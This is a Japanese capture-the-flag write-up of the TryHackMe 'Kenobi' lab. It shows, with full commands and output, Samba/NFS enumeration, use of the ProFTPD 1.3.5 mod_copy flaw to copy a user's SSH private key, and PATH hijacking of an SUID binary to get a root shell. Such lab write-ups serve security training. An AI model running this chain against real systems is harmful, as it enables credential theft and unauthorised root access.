TryHackMeのKenobiのwriteupおよびメモ。
- Task 1: Deploy the vulnerable machine
- Task 2: Enumerating Samba for shares
- Task 3: Gain initial access with ProFtpd
- Task 4: Privilege Escalation with Path Variable Manipulation
- PATH変数にパスを通す際は末尾ではなく先頭に追加する
Task 1: Deploy the vulnerable machine
Scan the machine with nmap, how many ports are open?
nmap -Pn 10.10.12.187┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ nmap -Pn 10.10.12.187
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-17 08:48 EDT
Nmap scan report for 10.10.12.187
Host is up (0.18s latency).
Not shown: 993 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2049/tcp open nfs
Nmap done: 1 IP address (1 host up) scanned in 27.74 seconds答えは7。
Task 2: Enumerating Samba for shares
Using the nmap command above, how many shares have been found?
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.12.187┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.12.187
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-17 08:52 EDT
Nmap scan report for 10.10.12.187
Host is up (0.20s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.12.187\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (kenobi server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.12.187\anonymous:
| Type: STYPE_DISKTREE
| Comment:
| Users: 0
| Max Users: <unlimited>
| Path: C:\home\kenobi\share
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.12.187\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
Nmap done: 1 IP address (1 host up) scanned in 29.82 seconds答えは3。
On most distributions of Linux smbclient is already installed. Lets inspect one of the shares. Using your machine, connect to the machines network share. Once you're connected, list the files on the share. What is the file can you see?
smbclient //10.10.12.187/anonymous┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ smbclient //10.10.12.187/anonymous
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Sep 4 06:49:09 2019
.. D 0 Wed Sep 4 06:56:07 2019
log.txt N 12237 Wed Sep 4 06:49:09 2019
9204224 blocks of size 1024. 6877092 blocks available
smb: \> 答えはlog.txt。
You can recursively download the SMB share too. Submit the username and password as nothing. smbget -R smb://10.10.12.187/anonymous Open the file on the share. There is a few interesting things found. Information generated for Kenobi when generating an SSH key for the user Information about the ProFTPD server.
smbget -R smb://10.10.12.187/anonymous自分の環境では上記のコマンドを実行してもSMB共有ファイルはダウンロードされなかった。sudoしてもダメだった。
┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ smbget -R smb://10.10.12.187/anonymous
handle_name_resolve_order: WARNING: Ignoring invalid list value 'smb://10.10.12.187/anonymous' for parameter 'name resolve order'
Downloaded 0b in 0 seconds
┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ sudo smbget -R smb://10.10.12.187/anonymous
[sudo] password for kali:
handle_name_resolve_order: WARNING: Ignoring invalid list value 'smb://10.10.12.187/anonymous' for parameter 'name resolve order'
Downloaded 0b in 0 secondsWhat port is FTP running on?
答えは21。
Your earlier nmap port scan will have shown port 111 running the service rpcbind. This is just a server that converts remote procedure call (RPC) program number into universal addresses. When an RPC service is started, it tells rpcbind the address at which it is listening and the RPC program number its prepared to serve. In our case, port 111 is access to a network file system. Lets use nmap to enumerate this. nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.12.187 What mount can we see?
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.12.187┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.12.187
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-17 09:07 EDT
Nmap scan report for 10.10.12.187
Host is up (0.18s latency).
PORT STATE SERVICE
111/tcp open rpcbind
| nfs-showmount:
|_ /var *
Nmap done: 1 IP address (1 host up) scanned in 3.12 seconds答えは/var
Task 3: Gain initial access with ProFtpd
Lets get the version of ProFtpd. Use netcat to connect to the machine on the FTP port. What is the version?
nc 10.10.12.187 21┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ nc 10.10.12.187 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.12.187]答えは1.3.5
We can use searchsploit to find exploits for a particular software version. Searchsploit is basically just a command line search tool for exploit-db.com. How many exploits are there for the ProFTPd running?
searchsploit ProFtpd 1.3.5┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ searchsploit ProFtpd 1.3.5
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2) | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results答えは4。
We're now going to copy Kenobi's private key using SITE CPFR and SITE CPTO commands. We knew that the /var directory was a mount we could see (task 2, question 4). So we've now moved Kenobi's private key to the /var/tmp directory.
nc 10.10.12.187 21
SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa上記のコマンドは標的マシン10.10.12.187のFTPポートに接続した後、10.10.12.187上にあるSSH秘密鍵/home/kenobi/.ssh/id_rsaを/var/tmp/id_rsaへコピーする。
┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ nc 10.10.12.187 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.12.187]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successfulLets mount the /var/tmp directory to our machine mkdir /mnt/kenobiNFS mount 10.10.12.187:/var /mnt/kenobiNFS ls -la /mnt/kenobiNFS We now have a network mount on our deployed machine! We can go to /var/tmp and get the private key then login to Kenobi's account. What is Kenobi's user flag (/home/kenobi/user.txt)?
mkdir /mnt/kenobiNFS
mount 10.10.12.187:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS上記のコマンドは標的マシン10.10.12.187の共有フォルダ/varをローカルマシンの/mnt/kenobiNFSへマウントして、共有フォルダの中身を閲覧する。
┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ sudo mkdir /mnt/kenobiNFS
[sudo] password for kali:
┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ sudo mount 10.10.12.187:/var /mnt/kenobiNFS
┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ ls -la /mnt/kenobiNFS
total 56
drwxr-xr-x 14 root root 4096 Sep 4 2019 .
drwxr-xr-x 3 root root 4096 Mar 17 09:23 ..
drwxr-xr-x 2 root root 4096 Sep 4 2019 backups
drwxr-xr-x 9 root root 4096 Sep 4 2019 cache
drwxrwxrwt 2 root root 4096 Sep 4 2019 crash
drwxr-xr-x 40 root root 4096 Sep 4 2019 lib
drwxrwsr-x 2 root staff 4096 Apr 12 2016 local
lrwxrwxrwx 1 root root 9 Sep 4 2019 lock -> /run/lock
drwxrwxr-x 10 root avahi 4096 Sep 4 2019 log
drwxrwsr-x 2 root mail 4096 Feb 26 2019 mail
drwxr-xr-x 2 root root 4096 Feb 26 2019 opt
lrwxrwxrwx 1 root root 4 Sep 4 2019 run -> /run
drwxr-xr-x 2 root root 4096 Jan 29 2019 snap
drwxr-xr-x 5 root root 4096 Sep 4 2019 spool
drwxrwxrwt 6 root root 4096 Mar 17 09:16 tmp
drwxr-xr-x 3 root root 4096 Sep 4 2019 wwwcp /mnt/kenobiNFS/tmp/id_rsa .
chmod 600 id_rsa
ssh -i id_rsa kenobi@10.10.12.187上記のコマンドは
- 先の設問でコピーしたSSH秘密鍵
/var/tmp/id_rsaをローカルマシンのカレントディレクトリにコピーする。 - 秘密鍵に適切なパーミッションを設定する。
- 秘密鍵を用いて標的マシン
10.10.12.187へSSH接続する。
秘密鍵に適切なパーミッションを設定しないでSSH接続しようとすると、以下のようなエラーメッセージが発生する。
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
kenobi@10.10.12.187's password: ┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ ls -l /mnt/kenobiNFS/tmp/id_rsa
-rw-r--r-- 1 kali kali 1675 Mar 17 09:16 /mnt/kenobiNFS/tmp/id_rsa
┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ cp /mnt/kenobiNFS/tmp/id_rsa .
┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ ls -l id_rsa
-rw-r--r-- 1 kali kali 1675 Mar 17 09:27 id_rsa
┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ file id_rsa
id_rsa: PEM RSA private key
┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ ssh -i id_rsa kenobi@10.10.12.187
The authenticity of host '10.10.12.187 (10.10.12.187)' can't be established.
ED25519 key fingerprint is SHA256:GXu1mgqL0Wk2ZHPmEUVIS0hvusx4hk33iTcwNKPktFw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.12.187' (ED25519) to the list of known hosts.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
kenobi@10.10.12.187's password:
┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ chmod 600 id_rsa
┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ ls -l id_rsa
-rw------- 1 kali kali 1675 Mar 17 09:27 id_rsa
┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$
┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ ssh -i id_rsa kenobi@10.10.12.187
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
103 packages can be updated.
65 updates are security updates.
Last login: Wed Sep 4 07:10:15 2019 from 192.168.1.147
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
kenobi@kenobi:~$ 標的マシンへのSSH接続に成功した。あとは/home/kenobi/user.txtを開くだけ。
kenobi@kenobi:~$ cat /home/kenobi/user.txt
d0b0f3f53b6caa532a83<REDACTED>Task 4: Privilege Escalation with Path Variable Manipulation
SUID bits can be dangerous, some binaries such as passwd need to be run with elevated privileges (as its resetting your password on the system), however other custom files could that have the SUID bit can lead to all sorts of issues. To search the a system for these type of files run the following: find / -perm -u=s -type f 2>/dev/null What file looks particularly out of the ordinary?
find / -perm -u=s -type f 2>/dev/nullkenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6答えは/usr/bin/menu
また、ファイルはrootの所有となっている。
kenobi@kenobi:~$ ls -l /usr/bin/menu
-rwsr-xr-x 1 root root 8880 Sep 4 2019 /usr/bin/menu
Run the binary, how many options appear?
kenobi@kenobi:~$ menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :答えは3。
Strings is a command on Linux that looks for human readable strings on a binary. This shows us the binary is running without a full path (e.g. not using /usr/bin/curl or /usr/bin/uname). As this file runs as the root users privileges, we can manipulate our path gain a root shell. We copied the /bin/sh shell, called it curl, gave it the correct permissions and then put its location in our path. This meant that when the /usr/bin/menu binary was run, its using our path variable to find the "curl" binary.. Which is actually a version of /usr/sh, as well as this file being run as root it runs our shell as root!
先の設問で発見した/usr/bin/menuをstringsにかけてみた。
kenobi@kenobi:/tmp$ strings /usr/bin/menu
/lib64/ld-linux-x86-64.so.2
~~ SNIPPED ~~
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
curl -I localhost
uname -r
ifconfig
~~ SNIPPED ~~
.jcr
.dynamic
.got.plt
.data
.bss以下の3つのコマンドがハードコードされているのがわかる。
curl -I localhostuname -rifconfig
/usr/bin/menuを実行して1.(status check)を選択するとcurl -I localhostコマンドが、2. (kernel version)を選択するとuname -rコマンドが、3. (ifconfig )を選択するとifconfigコマンド が、それぞれ実行される模様。
また、各コマンドにはフルパスが指定されていない。
なので例えば、悪意のあるファイルをcurlという名前で保存して、そのファイルの置いてあるパスをPATH変数に追加し、/usr/bin/menuを実行すれば、正規のcurlではなく悪意のあるcurlをroot権限で実行できる。(/usr/bin/menuはrootの所有でSUIDがセットされているため)
cd /tmp
echo "/bin/sh" > curl
chmod 777 curl
export PATH=/tmp:$PATH上記のコマンドは/tmpディレクトリにcurl (/bin/shのコピー)を作成し、/tmpをPATH変数に追加する。
この状態で/usr/bin/menuを実行して1.(status check)を選択すると、正規の/usr/bin/curlではなく、悪意のある/tmp/curlが実行される。
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$
kenobi@kenobi:/tmp$
kenobi@kenobi:/tmp$ menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)シェルがroot権限で起動した。
What is the root flag (/root/root.txt)?
起動したrootのシェルでcat /root/root.txtするだけ。
# ls -l /root/root.txt
-rw-r--r-- 1 root root 33 Sep 4 2019 /root/root.txt
# cat /root/root.txt
177b3cd8562289f373827<REDACTED>
PATH変数にパスを通す際は末尾ではなく先頭に追加する
Task 4にて/tmpディレクトリをPATH変数に追加した際、以下のようにPATH変数の先頭に追加した。
export PATH=/tmp:$PATHkenobi@kenobi:/tmp$ echo $PATH
/tmp:/home/kenobi/bin:/home/kenobi/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
実はこれが結構重要で、例えば以下のようにPATH変数の先頭ではなく末尾に/tmpディレクトリを追加したとする。
export PATH=$PATH:/tmpkenobi@kenobi:/tmp$ echo $PATH
/home/kenobi/bin:/home/kenobi/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/tmpこの状態で/usr/bin/menuを実行しても、/tmp/curlではなく正規の/usr/bin/curlが実行されてしまう。というのも、フルパスを指定しないでコマンドを実行した場合、シェルはPATH変数に登録されているパスを先頭から順番に参照するからである。
上記の例だと/tmp/curlが実行される前に/usr/bin/curlが実行されてしまう。
攻撃シナリオにおいては、正規のプログラムよりも自前の攻撃用のプログラムを実行したい場合がほとんどなので、PATH変数にパスを通す際は末尾ではなく先頭に追加するべきである。
